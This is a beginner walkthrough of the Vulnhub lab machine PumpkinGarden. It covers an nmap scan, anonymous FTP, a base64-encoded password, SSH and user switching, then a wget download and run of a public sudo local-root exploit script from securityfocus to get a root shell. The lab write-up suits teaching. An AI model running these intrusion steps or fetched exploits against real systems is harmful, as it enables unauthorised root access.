Mission-Pumpkin v1.0: PumpkinGarden Walkthrough
Description from Vulnhub:
Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of series of 3 machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to PumpkinGarden_key file stored in the root account.
Scanning
Since this box is geared towards very beginners, I try to explain everything in more depth. In order to get the running services, we have to scan the machine with a tool like nmap. I used multiple switches to get a better result. -A means we need everything -sV means version enumeration -sC means running default scripts and -p- means that we would like to scan the whole port range from 0 to 65535. This way, we can be pretty sure that we don’t miss anything important.
root :: ~ » nmap -A -sV -sC -p- 192.168.42.40
Nmap scan report for Pumpkin (192.168.42.40)
Host is up (0.00018s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.42.9
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
| 2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
| 256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_ 256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (ED25519)
MAC Address: 08:00:27:20:A9:84 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelAnonymous FTP
The very first thing that pops up is that anonymous login allowed on port 21, so we can log in without knowing any credentials. Just type anonymous for name and leave the password field blank.
root :: Vulnhub/PumpkinGarden » ftp 192.168.42.40
Connected to 192.168.42.40.
220 Welcome to Pumpkin's FTP service.
Name (192.168.42.40:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 113 4096 Jun 11 20:28 .
drwxr-xr-x 2 0 113 4096 Jun 11 20:28 ..
-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (88 bytes).
226 Transfer complete.
88 bytes received in 0.00 secs (1.6785 MB/s)
ftp> exit
221 Goodbye.
root :: Vulnhub/PumpkinGarden » cat note.txt
Hello Dear!
Looking for route map to PumpkinGarden? I think jack can help you find it.I found a note.txt file and downloaded it to my local machine with the get command. The note contains a username, but there’s nothing we can go on.
The web server
I decided to visit the web server and explore it a little bit. The site was very basic. However, the text suggests we should look under the hood.
Let’s view the source code to see if we can find anything.
Alright, it says Pumpkin images may help us find the way to the route map. This suggests checking out the /img directory on the server. The directory contained another directory called hidden_secret which contained a clue.txt file. Inside the file, there was this text:
c2NhcmVjcm93IDogNVFuQCR5
For beginners, this might be a little confusing but this is a base64 encoded text. It’s confusing because they typically end with one or two equal signs. You can easily decode it from the terminal, like this:
root :: ~ » echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d
scarecrow : 5Qn@$ySSH access
The decoded text looks like a “username : password” combination. I tried it against SSH and it was a success.
root :: ~ » ssh scarecrow@192.168.42.40 -p 3535
--------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
--------------------------------------------------------------------
scarecrow@192.168.42.40's password:
Last login: Sun Jul 14 13:48:22 2019 from kali
scarecrow@Pumpkin:~$ ls -la
total 28
drwx------ 2 scarecrow scarecrow 4096 Jun 11 21:50 .
drwxr-xr-x 5 root root 4096 Jun 11 18:25 ..
-rw------- 1 scarecrow scarecrow 117 Jun 13 00:36 .bash_history
-rw-r--r-- 1 scarecrow scarecrow 220 Jun 11 18:24 .bash_logout
-rw-r--r-- 1 scarecrow scarecrow 3637 Jun 11 18:24 .bashrc
-rw-r--r-- 1 root root 167 Jun 11 21:24 note.txt
-rw-r--r-- 1 scarecrow scarecrow 675 Jun 11 18:24 .profileAs you can see, there’s another note.txt file in the home directory.
scarecrow@Pumpkin:~$ cat note.txtOops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)!
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.scarecrow@Pumpkin:~$
Sweet! I checked the /etc/passwd file and identified 3 users on the machine, one of them was goblin .
Privilege escalation
I quickly switched users using the given credentials. I navigated to goblin ‘s home directory and found another note file.
scarecrow@Pumpkin:~$ su goblin
Password:
goblin@Pumpkin:/home/scarecrow$ cd ..
goblin@Pumpkin:/home$ cd goblin/
goblin@Pumpkin:~$ ls -la
total 28
drwx------ 2 goblin goblin 4096 Jun 13 00:49 .
drwxr-xr-x 5 root root 4096 Jun 11 18:25 ..
-rw------- 1 goblin goblin 32 Jun 11 21:55 .bash_history
-rw-r--r-- 1 goblin goblin 231 Jun 11 21:50 .bash_logout
-rw-r--r-- 1 goblin goblin 3637 Jun 11 18:25 .bashrc
-rw-r--r-- 1 root root 328 Jun 11 21:22 note
-rw-r--r-- 1 goblin goblin 675 Jun 11 18:25 .profile
goblin@Pumpkin:~$ cat noteHello Friend! I heard that you are looking for PumpkinGarden key.
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.shgoblin@Pumpkin:~$
It really can’t be easier than that… We were given a link to a shell script, which looks like an exploit from the URL. It might help us become root!
Getting root access
I spent a couple of minutes reading the script. It turns out, it needs a file with write permissions as the parameter. The script isn’t complicated, feel free to read it through and understand it. It’s the best way to learn new things!
We need a directory where we can write files. I usually use these three directories: /tmp, /var/tmpand /dev/shm The next step is to get the exploit to the machine somehow. Since wget is installed, we can use it to download the file. I chose the /dev/shm directory because the /tmp was frequently cleaned up and my files disappeared.
goblin@Pumpkin:~$ cd /dev/shm
goblin@Pumpkin:/dev/shm$ wget https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh
--2019-07-14 17:11:19-- https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh
Resolving www.securityfocus.com (www.securityfocus.com)... 34.201.211.24, 54.164.180.208, 64:ff9b::36a4:b4d0, ...
Connecting to www.securityfocus.com (www.securityfocus.com)|34.201.211.24|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://downloads.securityfocus.com/vulnerabilities/exploits/38362.sh [following]
--2019-07-14 17:11:21-- https://downloads.securityfocus.com/vulnerabilities/exploits/38362.sh
Resolving downloads.securityfocus.com (downloads.securityfocus.com)... 52.7.56.121, 54.209.252.161, 64:ff9b::36d1:fca1, ...
Connecting to downloads.securityfocus.com (downloads.securityfocus.com)|52.7.56.121|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 460 [application/x-sh]
Saving to: ‘38362.sh’100%[=================================================================>] 460 --.-K/s in 0s2019-07-14 17:11:23 (110 MB/s) - ‘38362.sh’ saved [460/460]
When you managed to download the file, the next step is to make it executable. Then, created an empty file with the touch command. Finally, the moment of truth. Execute the script and pass the file name as the parameter. If everything went well, you are presented with a root shell.
goblin@Pumpkin:/dev/shm$ chmod +x 38362.sh
goblin@Pumpkin:/dev/shm$ touch herewego
goblin@Pumpkin:/dev/shm$ ./38362.sh herewego
Tod Miller Sudo local root exploit
by Slouching
automated by kingcope
ALEX-ALEX
root@Pumpkin:/tmp# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)The flag
Finally, we can print out the flag in the root directory. Note that, it’s also base64 encoded!
root@Pumpkin:/tmp# cd
root@Pumpkin:~# ls -la
total 36
drwx------ 3 root root 4096 Jun 13 01:20 .
drwxr-xr-x 22 root root 4096 Jun 11 18:14 ..
-rw-r--r-- 1 root root 22 Jun 13 01:21 .bash_logout
-rw-r--r-- 1 root root 3106 Jun 11 18:30 .bashrc
drwx------ 2 root root 4096 Jun 11 21:30 .cache
-rw------- 1 root root 17 Jun 13 01:19 .nano_history
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 25 Jun 13 00:23 PumpkinGarden_Key
-rw-r--r-- 1 root root 66 Jun 11 21:59 .selected_editor
root@Pumpkin:~# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:~# cat PumpkinGarden_Key | base64 -d
Congratulations!Before you go
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏
